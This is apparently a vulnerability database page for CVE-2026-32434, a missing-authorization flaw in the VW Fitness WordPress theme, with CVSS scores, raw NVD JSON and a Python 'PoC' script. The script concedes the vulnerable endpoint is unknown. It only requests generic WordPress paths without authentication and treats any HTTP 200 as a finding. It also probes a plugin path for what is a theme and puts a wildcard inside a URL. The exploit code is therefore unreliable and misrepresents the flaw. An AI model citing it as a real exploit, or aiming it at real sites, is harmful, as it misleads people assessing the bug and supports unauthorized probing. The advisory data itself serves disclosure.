Security Vulnerability Report
中文
CVE-2026-32434 CVSS 5.3 MEDIUM

CVE-2026-32434

Published: 2026-03-13 19:55:03
Last Modified: 2026-04-29 10:17:10

Description

Missing Authorization vulnerability in vowelweb VW Fitness vw-fitness allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Fitness: from n/a through <= 4.3.4.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

vowelweb VW Fitness vw-fitness <= 4.3.4
VW Fitness n/a through 4.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2026-32434 PoC - VW Fitness Authorization Bypass # Target: WordPress site with VW Fitness theme <= 4.3.4 target_url = "http://target-site.com" # Since specific vulnerable endpoint is not provided, # this is a general PoC structure for Missing Authorization def check_vulnerability(): """ Check for Missing Authorization vulnerability in VW Fitness This PoC attempts to access protected endpoints without authentication """ # Common WordPress VW Fitness vulnerable endpoints # Adjust endpoints based on actual vulnerability research vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wp/v2/users", "/wp-content/plugins/vw-fitness/*" ] for endpoint in vulnerable_endpoints: url = f"{target_url}{endpoint}" try: response = requests.get(url, timeout=10) # Check if response indicates unauthorized access succeeded if response.status_code == 200: print(f"[+] Potential vulnerability at: {url}") print(f"[+] Status: {response.status_code}") except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") if __name__ == "__main__": print("CVE-2026-32434 VW Fitness Authorization Bypass PoC") check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32434", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:03.123", "lastModified": "2026-04-29T10:17:09.757", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in vowelweb VW Fitness vw-fitness allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects VW Fitness: from n/a through <= 4.3.4."}, {"lang": "es", "value": "Vulnerabilidad de autorización faltante en vowelweb VW Fitness vw-fitness permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a VW Fitness: desde n/a hasta &lt;= 4.3.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/vw-fitness/vulnerability/wordpress-vw-fitness-theme-4-3-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}